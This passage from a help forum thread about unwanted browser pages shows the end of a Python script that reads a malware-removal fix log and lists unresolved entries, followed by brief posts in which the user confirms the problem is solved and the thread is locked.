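        line = raw.strip()
        if line.startswith("fixlist content:"):
            in_echo, stars = True, 0
            continue
        if in_echo:
            # The echo sits between two asterisk rows; its ' => ' lines are requests, not outcomes.
            if line and set(line) == {"*"}:
                stars += 1
                in_echo = stars < 2
            continue
        if " => " in line:
            target, result = line.rsplit(" => ", 1)
            entries.append((target, result, classify(result)))
    return entries

def follow_up(entries):
    """Targets the tool did not change: errors and entries it could not find."""
    return [(t, r) for t, r, s in entries if s in ("unresolved", "absent")]

if __name__ == "__main__":
    for target, result in follow_up(parse_fixlog(SAMPLE_FIXLOG)):
        print("CHECK:", target, "->", result)
```

Entries reported here are candidates for a manual check or a fresh scan; the script only reads the log text and changes nothing on the system.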

Rudy
Site Admin
Posts: 118251
Joined: 30 Oct 2003 13:42
Location: Plzeň

Re: Unwanted pages opening in the browser

#10 Post by Rudy »

Deleted. Has anything changed?

veny
Visitor
Posts: 25
Joined: 27 Aug 2006 21:27

Re: Unwanted pages opening in the browser

#11 Post by veny »

I already wrote that in my previous post

everything runs as it should

thanks a lot once again :thumbsup: :thumbsup:

Rudy
Site Admin
Posts: 118251
Joined: 30 Oct 2003 13:42
Location: Plzeň

Re: Unwanted pages opening in the browser

#12 Post by Rudy »

OK, you're welcome! :)

Locked